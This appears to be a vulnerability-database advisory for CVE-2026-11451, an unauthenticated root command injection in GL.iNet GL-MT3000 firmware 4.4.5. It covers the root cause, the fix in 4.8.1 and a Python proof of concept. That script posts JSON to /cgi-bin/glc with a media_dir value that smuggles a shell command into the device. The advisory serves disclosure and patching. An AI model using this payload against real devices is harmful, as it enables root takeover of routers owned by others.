CVE-2026-11451
Description
Command injection in GL.iNet GL-MT3000 firmware 4.4.5 allows remote attackers to execute arbitrary commands as root.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Command injection in GL.iNet GL-MT3000 firmware 4.4.5 allows remote attackers to execute arbitrary commands as root.
Vulnerability
A command injection vulnerability exists in the /cgi-bin/glc endpoint of GL.iNet GL-MT3000 devices running firmware version 4.4.5. The nas-web.so plugin forwards requests to the local gl_nas_sys daemon, which handles FTP protocol configurations. The media_dir parameter is passed unsanitized into snprintf() and system() calls, allowing for command injection.
Exploitation
An unauthenticated remote attacker can exploit this by sending a POST request to /cgi-bin/glc with a crafted JSON payload. The payload should include a single quote in the media_dir argument to break out of the expected quoting context, followed by shell metacharacters like ;, >, and # to inject and execute arbitrary commands. The vulnerable flow involves the set_proto_config method being called without authentication checks [1].
Impact
Successful exploitation allows an attacker to execute arbitrary commands with root privileges on the affected device. This could lead to a full compromise of the device, including potential data exfiltration, modification, or the establishment of persistent access.
Mitigation
GL.iNet addressed this vulnerability in firmware version 4.8.1 by implementing proper sanitization of the media_dir parameter, specifically by escaping single quotes before writing to the FTP configuration. Users should upgrade to firmware version 4.8.1 or later to mitigate this risk. The vendor has confirmed that versions prior to 4.8.1 are affected [1].
AI Insight generated on Jun 7, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
2Patches
0No patches discovered yet.
Vulnerability mechanics
Root cause
"The FTP protocol handler in gl_nas_sys passes user-supplied input from the media_dir parameter unsanitized into snprintf() calls that are then executed by system()."
Attack vector
An unauthenticated attacker can send a POST request to the /cgi-bin/glc endpoint. The request body should be a JSON payload targeting the "nas-web" object and the "set_proto_config" method. By manipulating the "media_dir" argument within the JSON payload to include shell metacharacters like single quotes, semicolons, and hash symbols, an attacker can break out of the intended string context and inject arbitrary commands that are then executed with root privileges [ref_id=1].
Affected code
The vulnerability lies within the FTP protocol handler in the gl_nas_sys daemon, specifically in the function FUN_0045dc80. This function processes the "media_dir" parameter extracted from a JSON payload. It uses two snprintf() calls to construct commands, which are then executed via system(), without proper sanitization of shell metacharacters [ref_id=1]. The entry point /www/cgi-bin/glc and the nas-web.so plugin also contribute by forwarding the request without authentication or input validation [ref_id=1].
What the fix does
The vendor states that in version 4.8.1, the code now escapes single quotes using escape_single_quote() before writing media_dir to the FTP configuration command. This prevents payloads that rely on closing a single quote, appending commands with a semicolon, and commenting out the tail with '#' from executing. The vendor verified that similar payloads no longer trigger command execution, with the input being treated as ordinary configuration content instead of executable commands [ref_id=1].
Preconditions
- networkThe target device must be accessible over the network.
- authNo authentication is required to exploit this vulnerability.
- inputThe attacker must be able to send a crafted JSON payload to the /cgi-bin/glc endpoint.
Reproduction
```python #!/usr/bin/env python3 import json, urllib.request, ssl
ctx = ssl.create_default_context() ctx.check_hostname = False ctx.verify_mode = ssl.CERT_NONE
dev_name = "/codexp20';id>/tmp/nas_proto_poc 2>&1;#"
body = { "object": "nas-web", "method": "set_proto_config", "args": { "protos": [{ "name": "ftp", "enable": 1, "media_dir": dev_name }] } }
req = urllib.request.Request( "https://192.168.8.1/cgi-bin/glc", data=json.dumps(body).encode(), headers={"Content-Type": "application/json"}, method="POST", ) print(urllib.request.urlopen(req, timeout=10, context=ctx).read().decode()) print("[+] check /tmp/nas_proto_poc on target") ```
Generated on Jun 7, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
5News mentions
0No linked articles in our index yet.